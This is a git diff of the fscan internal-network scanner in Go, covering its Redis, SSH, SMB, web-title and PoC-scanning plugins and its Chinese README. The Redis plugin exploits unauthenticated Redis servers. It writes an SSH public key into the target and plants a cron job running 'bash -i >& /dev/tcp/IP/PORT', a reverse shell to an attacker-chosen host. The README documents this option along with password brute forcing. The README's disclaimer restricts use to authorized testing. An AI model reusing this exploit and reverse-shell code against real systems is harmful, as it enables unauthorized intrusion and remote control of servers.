+		return flag, err
+	}
+	err = conn.SetReadDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
 	if err != nil {
 		return flag, err
 	}
-	defer conn.Close()
 	_, err = conn.Write([]byte("info\r\n"))
 	if err != nil {
 		return flag, err
@@ -78,19 +109,22 @@ func RedisUnauth(info *common.HostInfo) (flag bool, err error) {
 		return flag, err
 	}
 	if strings.Contains(reply, "redis_version") {
-		result := fmt.Sprintf("[+] Redis:%s unauthorized", realhost)
-		common.LogSuccess(result)
 		flag = true
+		dbfilename, dir, err = getconfig(conn)
+		if err != nil {
+			result := fmt.Sprintf("[+] Redis:%s unauthorized", realhost)
+			common.LogSuccess(result)
+			return flag, err
+		} else {
+			result := fmt.Sprintf("[+] Redis:%s unauthorized file:%s/%s", realhost, dir, dbfilename)
+			common.LogSuccess(result)
+		}
 		err = Expoilt(realhost, conn)
 	}
 	return flag, err
 }
 
 func Expoilt(realhost string, conn net.Conn) error {
-	dbfilename, dir, err := getconfig(conn)
-	if err != nil {
-		return err
-	}
 	flagSsh, flagCron, err := testwrite(conn)
 	if err != nil {
 		return err
@@ -108,7 +142,7 @@ func Expoilt(realhost string, conn net.Conn) error {
 				result := fmt.Sprintf("[+] %v SSH public key was written successfully", realhost)
 				common.LogSuccess(result)
 			} else {
-				fmt.Println("Redis:", realhost, "SSHPUB write failed", text)
+				fmt.Println("[-] Redis:", realhost, "SSHPUB write failed", text)
 			}
 		}
 	}
@@ -130,6 +164,10 @@ func Expoilt(realhost string, conn net.Conn) error {
 		}
 	}
 	err = recoverdb(dbfilename, dir, conn)
+	//fmt.Println("dbfilename:")
+	//fmt.Println(dbfilename)
+	//fmt.Println("dir:")
+	//fmt.Println(dir)
 	return err
 }
 
@@ -153,14 +191,19 @@ func writekey(conn net.Conn, filename string) (flag bool, text string, err error
 			return flag, text, err
 		}
 		if strings.Contains(text, "OK") {
-			key, err := Readfile(filename)
-			if err != nil {
-				text = fmt.Sprintf("Open %s error, %v", filename, err)
-				return flag, text, err
-			}
-			if len(key) == 0 {
-				text = fmt.Sprintf("the keyfile %s is empty", filename)
-				return flag, text, err
+			var key string
+			if filename == "shadow" {
+				key = SshPub
+			} else {
+				key, err = Readfile(filename)
+				if err != nil {
+					text = fmt.Sprintf("Open %s error, %v", filename, err)
+					return flag, text, err
+				}
+				if len(key) == 0 {
+					text = fmt.Sprintf("the keyfile %s is empty", filename)
+					return flag, text, err
+				}
 			}
 			_, err = conn.Write([]byte(fmt.Sprintf("set x \"\\n\\n\\n%v\\n\\n\\n\"\r\n", key)))
 			if err != nil {
@@ -212,7 +255,11 @@ func writecron(conn net.Conn, host string) (flag bool, text string, err error) {
 			return flag, text, err
 		}
 		if strings.Contains(text, "OK") {
-			scanIp, scanPort := strings.Split(host, ":")[0], strings.Split(host, ":")[1]
+			target := strings.Split(host, ":")
+			if len(target) < 2 {
+				return flag, "host error", err
+			}
+			scanIp, scanPort := target[0], target[1]
 			_, err = conn.Write([]byte(fmt.Sprintf("set xx \"\\n* * * * * bash -i >& /dev/tcp/%v/%v 0>&1\\n\"\r\n", scanIp, scanPort)))
 			if err != nil {
 				return flag, text, err
@@ -260,14 +307,15 @@ func Readfile(filename string) (string, error) {
 }
 
 func readreply(conn net.Conn) (result string, err error) {
-	buf := make([]byte, 4096)
+	size := 5 * 1024
+	buf := make([]byte, size)
 	for {
 		count, err := conn.Read(buf)
 		if err != nil {
 			break
 		}
 		result += string(buf[0:count])
-		if count < 4096 {
+		if count < size {
 			break
 		}
 	}
@@ -310,7 +358,7 @@ func getconfig(conn net.Conn) (dbfilename string, dir string, err error) {
 	if err != nil {
 		return
 	}
-	text1 := strings.Split(text, "\n")
+	text1 := strings.Split(text, "\r\n")
 	if len(text1) > 2 {
 		dbfilename = text1[len(text1)-2]
 	} else {
@@ -324,7 +372,7 @@ func getconfig(conn net.Conn) (dbfilename string, dir string, err error) {
 	if err != nil {
 		return
 	}
-	text1 = strings.Split(text, "\n")
+	text1 = strings.Split(text, "\r\n")
 	if len(text1) > 2 {
 		dir = text1[len(text1)-2]
 	} else {

Plugins/scanner.go

@@ -13,22 +13,33 @@ import (
 
 func Scan(info common.HostInfo) {
 	fmt.Println("start infoscan")
-	Hosts, _ := common.ParseIP(info.Host, common.HostFile)
+	Hosts, err := common.ParseIP(info.Host, common.HostFile, common.NoHosts)
+	if err != nil {
+		fmt.Println("len(hosts)==0", err)
+		return
+	}
 	lib.Inithttp(common.Pocinfo)
 	var ch = make(chan struct{}, common.Threads)
 	var wg = sync.WaitGroup{}
 	if len(Hosts) > 0 {
 		if common.IsPing == false {
-			Hosts = ICMPRun(Hosts, common.Ping)
-			fmt.Println("icmp alive hosts len is:", len(Hosts))
+			Hosts = CheckLive(Hosts, common.Ping)
+			fmt.Println("[*] Icmp alive hosts len is:", len(Hosts))
 		}
 		if info.Scantype == "icmp" {
+			common.LogWG.Wait()
 			return
 		}
-		AlivePorts := PortScan(Hosts, info.Ports, info.Timeout)
-		fmt.Println("alive ports len is:", len(AlivePorts))
-		if info.Scantype == "portscan" {
-			return
+		var AlivePorts []string
+		if info.Scantype == "webonly" {
+			AlivePorts = NoPortScan(Hosts, info.Ports)
+		} else {
+			AlivePorts = PortScan(Hosts, info.Ports, info.Timeout)
+			fmt.Println("[*] alive ports len is:", len(AlivePorts))
+			if info.Scantype == "portscan" {
+				common.LogWG.Wait()
+				return
+			}
 		}
 
 		var severports []string //severports := []string{"21","22","135"."445","1433","3306","5432","6379","9200","11211","27017"...}
@@ -38,12 +49,14 @@ func Scan(info common.HostInfo) {
 		fmt.Println("start vulscan")
 		for _, targetIP := range AlivePorts {
 			info.Host, info.Ports = strings.Split(targetIP, ":")[0], strings.Split(targetIP, ":")[1]
-			if info.Scantype == "all" {
+			if info.Scantype == "all" || info.Scantype == "main" {
 				switch {
+				case info.Ports == "135":
+					AddScan(info.Ports, info, ch, &wg) //findnet
 				case info.Ports == "445":
 					//AddScan(info.Ports, info, ch, &wg)  //smb
 					AddScan("1000001", info, ch, &wg) //ms17010
-					AddScan("1000002", info, ch, &wg) //smbghost
+					//AddScan("1000002", info, ch, &wg) //smbghost
 				case info.Ports == "9000":
 					AddScan(info.Ports, info, ch, &wg) //fcgiscan
 					AddScan("1000003", info, ch, &wg)  //http

Plugins/smb.go

@@ -1,6 +1,7 @@
 package Plugins
 
 import (
+	"errors"
 	"fmt"
 	"github.com/shadow1ng/fscan/common"
 	"github.com/stacktitan/smb/smb"
@@ -9,6 +10,9 @@ import (
 )
 
 func SmbScan(info *common.HostInfo) (tmperr error) {
+	if common.IsBrute {
+		return nil
+	}
 	starttime := time.Now().Unix()
 	for _, user := range common.Userdict["smb"] {
 		for _, pass := range common.Passwords {
@@ -72,6 +76,6 @@ func doWithTimeOut(info *common.HostInfo, user string, pass string) (flag bool,
 	case <-signal:
 		return flag, err
 	case <-time.After(time.Duration(info.Timeout) * time.Second):
-		return false, err
+		return false, errors.New("time out")
 	}
 }

Plugins/ssh.go

@@ -12,6 +12,9 @@ import (
 )
 
 func SshScan(info *common.HostInfo) (tmperr error) {
+	if common.IsBrute {
+		return
+	}
 	starttime := time.Now().Unix()
 	for _, user := range common.Userdict["ssh"] {
 		for _, pass := range common.Passwords {

Plugins/webtitle.go

@@ -1,107 +1,95 @@
 package Plugins
 
 import (
-	"bytes"
 	"compress/gzip"
+	"crypto/tls"
 	"fmt"
-	"github.com/saintfish/chardet"
 	"github.com/shadow1ng/fscan/WebScan"
 	"github.com/shadow1ng/fscan/WebScan/lib"
 	"github.com/shadow1ng/fscan/common"
-	"golang.org/x/net/html/charset"
 	"golang.org/x/text/encoding/simplifiedchinese"
-	"golang.org/x/text/transform"
 	"io"
 	"io/ioutil"
+	"net"
 	"net/http"
 	"net/url"
 	"regexp"
 	"strings"
-)
-
-var (
-	Charsets = []string{"utf-8", "gbk", "gb2312"}
+	"time"
+	"unicode/utf8"
 )
 
 func WebTitle(info *common.HostInfo) error {
-	err := GOWebTitle(info)
-	if err != nil {
+	err, CheckData := GOWebTitle(info)
+	info.Infostr = WebScan.InfoCheck(info.Url, &CheckData)
+	if common.IsWebCan == false && common.IsBrute == false && err == nil {
+		WebScan.WebScan(info)
+	} else {
 		errlog := fmt.Sprintf("[-] webtitle %v %v", info.Url, err)
 		common.LogError(errlog)
 	}
 	return err
 }
-
-//flag 1 first try
-//flag 2 /favicon.ico
-//flag 3 302
-//flag 4 400 -> https
-
-func GOWebTitle(info *common.HostInfo) error {
-	var CheckData []WebScan.CheckDatas
+func GOWebTitle(info *common.HostInfo) (err error, CheckData []WebScan.CheckDatas) {
 	if info.Url == "" {
-		if info.Ports == "80" {
+		switch info.Ports {
+		case "80":
 			info.Url = fmt.Sprintf("http://%s", info.Host)
-		} else if info.Ports == "443" {
+		case "443":
 			info.Url = fmt.Sprintf("https://%s", info.Host)
-		} else {
-			info.Url = fmt.Sprintf("http://%s:%s", info.Host, info.Ports)
+		default:
+			host := fmt.Sprintf("%s:%s", info.Host, info.Ports)
+			protocol := GetProtocol(host, info.Timeout)
+			info.Url = fmt.Sprintf("%s://%s:%s", protocol, info.Host, info.Ports)
 		}
 	} else {
 		if !strings.Contains(info.Url, "://") {
-			info.Url = fmt.Sprintf("http://%s", info.Url)
-		}
-	}
-	err, result, CheckData := geturl(info, 1, CheckData)
-	if err != nil && !strings.Contains(err.Error(), "EOF") {
-		return err
-	}
-	if strings.Contains(result, "://") {
-		//有跳转
-		redirecturl, err := url.Parse(result)
-		if err == nil {
-			info.Url = redirecturl.String()
-			err, result, CheckData = geturl(info, 3, CheckData)
-			if err != nil {
-				return err
-			}
+			host := strings.Split(info.Url, "/")[0]
+			protocol := GetProtocol(host, info.Timeout)
+			info.Url = fmt.Sprintf("%s://%s", protocol, info.Url)
 		}
 	}
 
-	if result == "https" {
+	err, result, CheckData := geturl(info, 1, CheckData)
+	if err != nil && !strings.Contains(err.Error(), "EOF") {
+		return
+	}
+
+	//有跳转
+	if strings.Contains(result, "://") {
+		info.Url = result
+		err, result, CheckData = geturl(info, 3, CheckData)
+		if err != nil {
+			return
+		}
+	}
+
+	if result == "https" && !strings.HasPrefix(info.Url, "https://") {
 		info.Url = strings.Replace(info.Url, "http://", "https://", 1)
 		err, result, CheckData = geturl(info, 1, CheckData)
+		//有跳转
 		if strings.Contains(result, "://") {
-			//有跳转
-			redirecturl, err := url.Parse(result)
-			if err == nil {
-				info.Url = redirecturl.String()
-				err, result, CheckData = geturl(info, 3, CheckData)
-				if err != nil {
-					return err
-				}
-			}
-		} else {
+			info.Url = result
+			err, result, CheckData = geturl(info, 3, CheckData)
 			if err != nil {
-				return err
+				return
 			}
 		}
 	}
 
 	err, _, CheckData = geturl(info, 2, CheckData)
 	if err != nil {
-		return err
+		return
 	}
-
-	info.Infostr = WebScan.InfoCheck(info.Url, CheckData)
-
-	if common.IsWebCan == false {
-		WebScan.WebScan(info)
-	}
-	return err
+	return
 }
 
 func geturl(info *common.HostInfo, flag int, CheckData []WebScan.CheckDatas) (error, string, []WebScan.CheckDatas) {
+	//flag 1 first try
+	//flag 2 /favicon.ico
+	//flag 3 302
+	//flag 4 400 -> https
+
 	Url := info.Url
 	if flag == 2 {
 		URL, err := url.Parse(Url)
@@ -111,127 +99,65 @@ func geturl(info *common.HostInfo, flag int, CheckData []WebScan.CheckDatas) (er
 			Url += "/favicon.ico"
 		}
 	}
+	req, err := http.NewRequest("GET", Url, nil)
+	if err != nil {
+		return err, "", CheckData
+	}
+	req.Header.Set("User-agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36")
+	req.Header.Set("Accept", "*/*")
+	req.Header.Set("Accept-Language", "zh-CN,zh;q=0.9")
+	if common.Pocinfo.Cookie != "" {
+		req.Header.Set("Cookie", "rememberMe=1;"+common.Pocinfo.Cookie)
+	} else {
+		req.Header.Set("Cookie", "rememberMe=1")
+	}
+	req.Header.Set("Connection", "close")
+	var client *http.Client
+	if flag == 1 {
+		client = lib.ClientNoRedirect
+	} else {
+		client = lib.Client
+	}
 
-	res, err := http.NewRequest("GET", Url, nil)
-	if err == nil {
-		res.Header.Set("User-agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36")
-		res.Header.Set("Accept", "*/*")
-		res.Header.Set("Accept-Language", "zh-CN,zh;q=0.9")
-		if common.Pocinfo.Cookie != "" {
-			res.Header.Set("Cookie", "rememberMe=1;"+common.Pocinfo.Cookie)
-		} else {
-			res.Header.Set("Cookie", "rememberMe=1")
-		}
-		res.Header.Set("Connection", "close")
-
-		var client *http.Client
-		if flag == 1 {
-			client = lib.ClientNoRedirect
-		} else {
-			client = lib.Client
-		}
-
-		resp, err := client.Do(res)
-		if err == nil {
-			defer resp.Body.Close()
-			var title string
-			var text []byte
-			body, err := getRespBody(resp)
-			if err != nil {
-				return err, "", CheckData
-			}
-			if flag != 2 {
-				re := regexp.MustCompile("(?ims)<title>(.*)</title>")
-				find := re.FindSubmatch(body)
-				if len(find) > 1 {
-					text = find[1]
-					GetEncoding := func() string { // 判断Content-Type
-						r1, err := regexp.Compile(`(?im)charset=\s*?([\w-]+)`)
-						if err != nil {
-							return ""
-						}
-						headerCharset := r1.FindString(resp.Header.Get("Content-Type"))
-						if headerCharset != "" {
-							for _, v := range Charsets { // headers 编码优先，所以放在前面
-								if strings.Contains(strings.ToLower(headerCharset), v) == true {
-									return v
-								}
-							}
-						}
-
-						r2, err := regexp.Compile(`(?im)<meta.*?charset=['"]?([\w-]+)["']?.*?>`)
-						if err != nil {
-							return ""
-						}
-						htmlCharset := r2.FindString(string(body))
-						if htmlCharset != "" {
-							for _, v := range Charsets {
-								if strings.Contains(strings.ToLower(htmlCharset), v) == true {
-									return v
-								}
-							}
-						}
-						return ""
-					}
-					encode := GetEncoding()
-					_, encode1, _ := charset.DetermineEncoding(body, "")
-					var encode2 string
-					detector := chardet.NewTextDetector()
-					detectorstr, _ := detector.DetectBest(body)
-					if detectorstr != nil {
-						encode2 = detectorstr.Charset
-					}
-					if encode == "gbk" || encode == "gb2312" || encode1 == "gbk" || strings.Contains(strings.ToLower(encode2), "gb") {
-						titleGBK, err := Decodegbk(text)
-						if err == nil {
-							title = string(titleGBK)
-						}
-					} else {
-						title = string(text)
-					}
-				} else {
-					title = "None"
-				}
-				title = strings.Trim(title, "\r\n \t")
-				title = strings.Replace(title, "\n", "", -1)
-				title = strings.Replace(title, "\r", "", -1)
-				title = strings.Replace(title, "&nbsp;", " ", -1)
-				if len(title) > 100 {
-					title = title[:100]
-				}
-				if title == "" {
-					title = "None"
-				}
-				length := resp.Header.Get("Content-Length")
-				if length == "" {
-					length = fmt.Sprintf("%v", len(text))
-				}
-				result := fmt.Sprintf("[*] WebTitle:%-25v code:%-3v len:%-6v title:%v", Url, resp.StatusCode, length, title)
-				common.LogSuccess(result)
-			}
-			CheckData = append(CheckData, WebScan.CheckDatas{body, fmt.Sprintf("%s", resp.Header)})
-			redirURL, err1 := resp.Location()
-			if err1 == nil {
-				return nil, redirURL.String(), CheckData
-			}
-			if resp.StatusCode == 400 && info.Url[:5] != "https" {
-				return err, "https", CheckData
-			}
-			return err, "", CheckData
-		}
+	resp, err := client.Do(req)
+	if err != nil {
 		return err, "https", CheckData
 	}
-	return err, "", CheckData
-}
 
-func Decodegbk(s []byte) ([]byte, error) { // GBK解码
-	I := bytes.NewReader(s)
-	O := transform.NewReader(I, simplifiedchinese.GBK.NewDecoder())
-	d, e := ioutil.ReadAll(O)
-	if e != nil {
-		return nil, e
+	defer resp.Body.Close()
+	var title string
+	body, err := getRespBody(resp)
+	if err != nil {
+		return err, "https", CheckData
 	}
-	return d, nil
+	if !utf8.Valid(body) {
+		body, _ = simplifiedchinese.GBK.NewDecoder().Bytes(body)
+	}
+	CheckData = append(CheckData, WebScan.CheckDatas{body, fmt.Sprintf("%s", resp.Header)})
+	var reurl string
+	if flag != 2 {
+		title = gettitle(body)
+		length := resp.Header.Get("Content-Length")
+		if length == "" {
+			length = fmt.Sprintf("%v", len(body))
+		}
+		redirURL, err1 := resp.Location()
+		if err1 == nil {
+			reurl = redirURL.String()
+		}
+		result := fmt.Sprintf("[*] WebTitle:%-25v code:%-3v len:%-6v title:%v", resp.Request.URL, resp.StatusCode, length, title)
+		if reurl != "" {
+			result += fmt.Sprintf(" 跳转url: %s", reurl)
+		}
+		common.LogSuccess(result)
+	}
+	if reurl != "" {
+		return nil, reurl, CheckData
+	}
+	if resp.StatusCode == 400 && !strings.HasPrefix(info.Url, "https") {
+		return nil, "https", CheckData
+	}
+	return nil, "", CheckData
 }
 
 func getRespBody(oResp *http.Response) ([]byte, error) {
@@ -258,8 +184,49 @@ func getRespBody(oResp *http.Response) ([]byte, error) {
 		if err != nil {
 			return nil, err
 		}
-		defer oResp.Body.Close()
 		body = raw
 	}
 	return body, nil
 }
+
+func gettitle(body []byte) (title string) {
+	re := regexp.MustCompile("(?ims)<title>(.*)</title>")
+	find := re.FindSubmatch(body)
+	if len(find) > 1 {
+		title = string(find[1])
+		title = strings.TrimSpace(title)
+		title = strings.Replace(title, "\n", "", -1)
+		title = strings.Replace(title, "\r", "", -1)
+		title = strings.Replace(title, "&nbsp;", " ", -1)
+		if len(title) > 100 {
+			title = title[:100]
+		}
+	}
+	if title == "" {
+		title = "None"
+	}
+	return
+}
+
+func GetProtocol(host string, Timeout int64) (protocol string) {
+	protocol = "http"
+	//如果端口是80或443,跳过Protocol判断
+	if strings.HasSuffix(host, ":80") || !strings.Contains(host, ":") {
+		return
+	} else if strings.HasSuffix(host, ":443") {
+		protocol = "https"
+		return
+	}
+
+	conn, err := tls.DialWithDialer(&net.Dialer{Timeout: time.Duration(Timeout) * time.Second}, "tcp", host, &tls.Config{InsecureSkipVerify: true})
+	defer func() {
+		if conn != nil {
+			conn.Close()
+		}
+	}()
+
+	if err == nil || strings.Contains(err.Error(), "handshake failure") {
+		protocol = "https"
+	}
+	return protocol
+}

README.md

@@ -10,8 +10,8 @@
 * 端口扫描
 
 2.爆破功能:
-* 各类服务爆破(ssh、smb等)
-* 数据库密码爆破(mysql、mssql、redis、psql等)  
+* 各类服务爆破(ssh、smb、rdp等)
+* 数据库密码爆破(mysql、mssql、redis、psql、oracle等)  
 
 3.系统信息、漏洞扫描:  
 * netbios探测、域控识别  
@@ -51,6 +51,8 @@ fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密码碰撞)
 fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
 fscan.exe -hf ip.txt  (以文件导入)
 fscan.exe -u http://baidu.com -proxy 8080 (扫描单个url,并设置http代理 http://127.0.0.1:8080)
+fscan.exe -h 192.168.1.1/24 -nobr -nopoc (不进行爆破,不扫Web poc,以减少流量)
+fscan.exe -h 192.168.1.1/24 -pa 3389 (在原基础上,加入3389->rdp扫描)
 ```
 编译命令
 ```
@@ -59,60 +61,74 @@ go build -ldflags="-s -w " -trimpath
 
 完整参数
 ```
-   -Num int
-        poc rate (default 20)
   -c string
-        exec command (ssh)
+        ssh命令执行
   -cookie string
-        set poc cookie
-  -debug
-        debug mode will print more error info
+        设置cookie
+  -debug int
+        多久没响应,就打印当前进度(default 60)
   -domain string
-        smb domain
+        smb爆破模块时,设置域名
   -h string
-        IP address of the host you want to scan,for example: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12
+        目标ip: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12
   -hf string
-        host file, -hs ip.txt
+        读取文件中的目标
+  -hn string
+        扫描时,要跳过的ip: -hn 192.168.1.1/24
   -m string
-        Select scan type ,as: -m ssh (default "all")
+        设置扫描模式: -m ssh (default "all")
   -no
-        not to save output log
+        扫描结果不保存到文件中
+  -nobr
+        跳过sql、ftp、ssh等的密码爆破
   -nopoc
-        not to scan web vul
+        跳过web poc扫描
   -np
-        not to ping
+        跳过存活探测
+  -num int
+        web poc 发包速率  (default 20)
   -o string
-        Outputfile (default "result.txt")
+        扫描结果保存到哪 (default "result.txt")
   -p string
-        Select a port,for example: 22 | 1-65535 | 22,80,3306 (default "21,22,80,81,135,443,445,1433,3306,5432,6379,7001,8000,8080,8089,9200,11211,270179098,9448,8888,82,8858,1081,8879,21502,9097,8088,8090,8200,91,1080,889,8834,8011,9986,9043,9988,7080,10000,9089,8028,9999,8001,89,8086,8244,9000,2008,8080,7000,8030,8983,8096,8288,18080,8020,8848,808,8099,6868,18088,10004,8443,8042,7008,8161,7001,1082,8095,8087,8880,9096,7074,8044,8048,9087,10008,2020,8003,8069,20000,7688,1010,8092,8484,6648,9100,21501,8009,8360,9060,85,99,8000,9085,9998,8172,8899,9084,9010,9082,10010,7005,12018,87,7004,18004,8098,18098,8002,3505,8018,3000,9094,83,8108,1118,8016,20720,90,8046,9443,8091,7002,8868,8010,18082,8222,7088,8448,18090,3008,12443,9001,9093,7003,8101,14000,7687,8094,9002,8082,9081,8300,9086,8081,8089,8006,443,7007,7777,1888,9090,9095,81,1000,18002,8800,84,9088,7071,7070,8038,9091,8258,9008,9083,16080,88,8085,801,5555,7680,800,8180,9800,10002,18000,18008,98,28018,86,9092,8881,8100,8012,8084,8989,6080,7078,18001,8093,8053,8070,8280,880,92,9099,8181,9981,8060,8004,8083,10001,8097,21000,80,7200,888,7890,3128,8838,8008,8118,9080,2100,7180,9200")
+        设置扫描的端口: 22 | 1-65535 | 22,80,3306 (default "21,22,80,81,135,139,443,445,1433,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017")
+  -pa string
+        新增需要扫描的端口,-pa 3389 (会在原有端口列表基础上,新增该端口)
+  -path string
+        fcgi、smb romote file path
   -ping
-        using ping replace icmp
+        使用ping代替icmp进行存活探测
+  -pn string
+        扫描时要跳过的端口,as: -pn 445
   -pocname string
-        use the pocs these contain pocname, -pocname weblogic
+        指定web poc的模糊名字, -pocname weblogic
   -proxy string
-        set poc proxy, -proxy http://127.0.0.1:8080
-  -pwd string
-        password
-  -pwdf string
-        password file
-  -rf string
-        redis file to write sshkey file (as: -rf id_rsa.pub)
-  -rs string
-        redis shell to write cron file (as: -rs 192.168.1.1:6666)
-  -t int
-        Thread nums (default 600)
-  -time int
-        Set timeout (default 3)
-  -u string
-        url
-  -uf string
-        urlfile
+        设置代理, -proxy http://127.0.0.1:8080
   -user string
-        username
+        指定爆破时的用户名
   -userf string
-        username file
+        指定爆破时的用户名文件
+  -pwd string
+        指定爆破时的密码
+  -pwdf string
+        指定爆破时的密码文件
+  -rf string
+        指定redis写公钥用模块的文件 (as: -rf id_rsa.pub)
+  -rs string
+        redis计划任务反弹shell的ip端口 (as: -rs 192.168.1.1:6666)
+  -silent
+        静默扫描,适合cs扫描时不回显
+  -sshkey string
+        ssh连接时,指定ssh私钥
+  -t int
+        扫描线程 (default 600)
+  -time int
+        端口扫描超时时间 (default 3)
+  -u string
+        指定Url扫描
+  -uf string
+        指定Url文件扫描
   -wt int
-        Set web timeout (default 5)
+        web访问超时时间 (default 5)
 ```
 
 ## 运行截图
@@ -137,6 +153,8 @@ go build -ldflags="-s -w " -trimpath
 `go run .\main.go -h 192.168.x.x/24 -m netbios(-m netbios时,才会显示完整的netbios信息)`
 ![](image/netbios1.png)
 
+`go run .\main.go -h 192.0.0.0/8 -m icmp(探测每个C段的网关和数个随机IP,并统计top 10 B、C段存活数量)`
+![img.png](image/live.png)
 ## 参考链接
 https://github.com/Adminisme/ServerScan  
 https://github.com/netxfly/x-crack  
@@ -144,6 +162,7 @@ https://github.com/hack2fun/Gscan
 https://github.com/k8gege/LadonGo   
 https://github.com/jjf012/gopoc
 
+
 # 404StarLink 2.0 - Galaxy
 ![](https://github.com/knownsec/404StarLink-Project/raw/master/logo.png)
 
@@ -152,7 +171,29 @@ fscan 是 404Team [星链计划2.0](https://github.com/knownsec/404StarLink2.0-G
 - [https://github.com/knownsec/404StarLink2.0-Galaxy#community](https://github.com/knownsec/404StarLink2.0-Galaxy#community)
 
 
+## Star Chart
+[![Stargazers over time](https://starchart.cc/shadow1ng/fscan.svg)](https://starchart.cc/shadow1ng/fscan)
+
+## 免责声明
+
+本工具仅面向**合法授权**的企业安全建设行为，如您需要测试本工具的可用性，请自行搭建靶机环境。
+
+为避免被恶意使用，本项目所有收录的poc均为漏洞的理论判断，不存在漏洞利用过程，不会对目标发起真实攻击和漏洞利用。
+
+在使用本工具进行检测时，您应确保该行为符合当地的法律法规，并且已经取得了足够的授权。**请勿对非授权目标进行扫描。**
+
+如您在使用本工具的过程中存在任何非法行为，您需自行承担相应后果，我们将不承担任何法律及连带责任。
+
+在安装并使用本工具前，请您**务必审慎阅读、充分理解各条款内容**，限制、免责条款或者其他涉及您重大权益的条款可能会以加粗、加下划线等形式提示您重点注意。
+除非您已充分阅读、完全理解并接受本协议所有条款，否则，请您不要安装并使用本工具。您的使用行为或者您以其他任何明示或者默示方式表示接受本协议的，即视为您已阅读并同意本协议的约束。
+
 ## 最近更新
+[+] 2022/4/20 poc模块加入指定目录或文件 -pocpath poc路径,端口可以指定文件-portf port.txt,rdp模块加入多线程爆破demo, -br xx指定线程  
+[+] 2022/2/25 新增-m webonly,跳过端口扫描,直接访问http。致谢@AgeloVito  
+[+] 2022/1/11 新增oracle密码爆破  
+[+] 2022/1/7  扫ip/8时,默认会扫每个C段的网关和数个随机IP,推荐参数:-h ip/8 -m icmp.新增LiveTop功能,检测存活时,默认会输出top10的B、C段ip存活数量.  
+[+] 2021/12/7 新增rdp扫描,新增添加端口参数-pa 3389(会在原有端口列表基础上,新增该端口)  
+[+] 2021/12/1 优化xray解析模块,支持groups、新增poc,加入https判断(tls握手包),优化ip解析模块(支持所有ip/xx),增加爆破关闭参数 -nobr,添加跳过某些ip扫描功能 -hn 192.168.1.1,添加跳过某些端口扫描功能-pn 21,445,增加扫描docker未授权漏洞  
 [+] 2021/6/18 改善一下poc的机制，如果识别出指纹会根据指纹信息发送poc，如果没有识别到指纹才会把所有poc打一遍  
 [+] 2021/5/29 加入fcgi协议未授权命令执行扫描,优化poc模块,优化icmp模块,ssh模块加入私钥连接  
 [+] 2021/5/15 新增win03版本(删减了xray_poc模块),增加-silent 静默扫描模式,添加web指纹,修复netbios模块数组越界,添加一个CheckErrs字典,webtitle 增加gzip解码  
@@ -170,4 +211,4 @@ fscan 是 404Team [星链计划2.0](https://github.com/knownsec/404StarLink2.0-G
 [+] 2020/11/17 增加-ping 参数,作用是存活探测模块用ping代替icmp发包。   
 [+] 2020/11/17 增加WebScan模块,新增shiro简单识别。https访问时,跳过证书认证。将服务模块和web模块的超时分开,增加-wt 参数(WebTimeout)。    
 [+] 2020/11/16 对icmp模块进行优化,增加-it 参数(IcmpThreads),默认11000,适合扫B段  
-[+] 2020/11/15 支持ip以文件导入,-hs ip.txt,并对去重做了处理
+[+] 2020/11/15 支持ip以文件导入,-hf ip.txt,并对去重做了处理

WebScan/InfoScan.go

@@ -13,11 +13,11 @@ type CheckDatas struct {
 	Headers string
 }
 
-func InfoCheck(Url string, CheckData []CheckDatas) []string {
+func InfoCheck(Url string, CheckData *[]CheckDatas) []string {
 	var matched bool
 	var infoname []string
 
-	for _, data := range CheckData {
+	for _, data := range *CheckData {
 		for _, rule := range info.RuleDatas {
 			if rule.Type == "code" {
 				matched, _ = regexp.MatchString(rule.Rule, string(data.Body))
@@ -67,4 +67,3 @@ func removeDuplicateElement(languages []string) []string {
 	}
 	return result
 }
-

WebScan/WebScan.go

@@ -6,35 +6,93 @@ import (
 	"github.com/shadow1ng/fscan/WebScan/lib"
 	"github.com/shadow1ng/fscan/common"
 	"net/http"
+	"os"
+	"path/filepath"
 	"strings"
+	"sync"
 )
 
 //go:embed pocs
 var Pocs embed.FS
+var once sync.Once
+var AllPocs []*lib.Poc
 
 func WebScan(info *common.HostInfo) {
+	once.Do(initpoc)
 	var pocinfo = common.Pocinfo
-	buf := strings.Split(info.Url,"/")
-	pocinfo.Target = strings.Join(buf[:3],"/")
-	for _,infostr := range info.Infostr {
-		pocinfo.PocName = lib.CheckInfoPoc(infostr)
-		err := Execute(pocinfo)
-		if err != nil {
-			errlog := fmt.Sprintf("[-] webtitle %v %v", info.Url, err)
-			common.LogError(errlog)
+	buf := strings.Split(info.Url, "/")
+	pocinfo.Target = strings.Join(buf[:3], "/")
+
+	if pocinfo.PocName != "" {
+		Execute(pocinfo)
+	} else {
+		for _, infostr := range info.Infostr {
+			pocinfo.PocName = lib.CheckInfoPoc(infostr)
+			Execute(pocinfo)
 		}
 	}
 }
 
-func Execute(PocInfo common.PocInfo) error {
+func Execute(PocInfo common.PocInfo) {
 	req, err := http.NewRequest("GET", PocInfo.Target, nil)
 	if err != nil {
-		return err
+		errlog := fmt.Sprintf("[-] webpocinit %v %v", PocInfo.Target, err)
+		common.LogError(errlog)
+		return
 	}
 	req.Header.Set("User-agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36")
 	if PocInfo.Cookie != "" {
 		req.Header.Set("Cookie", PocInfo.Cookie)
 	}
-	lib.CheckMultiPoc(req, Pocs, PocInfo.Num, PocInfo.PocName)
-	return nil
+	pocs := filterPoc(PocInfo.PocName)
+	lib.CheckMultiPoc(req, pocs, PocInfo.Num)
+}
+
+func initpoc() {
+	if common.PocPath == "" {
+		entries, err := Pocs.ReadDir("pocs")
+		if err != nil {
+			fmt.Printf("[-] init poc error: %v", err)
+			return
+		}
+		for _, one := range entries {
+			path := one.Name()
+			if strings.HasSuffix(path, ".yaml") || strings.HasSuffix(path, ".yml") {
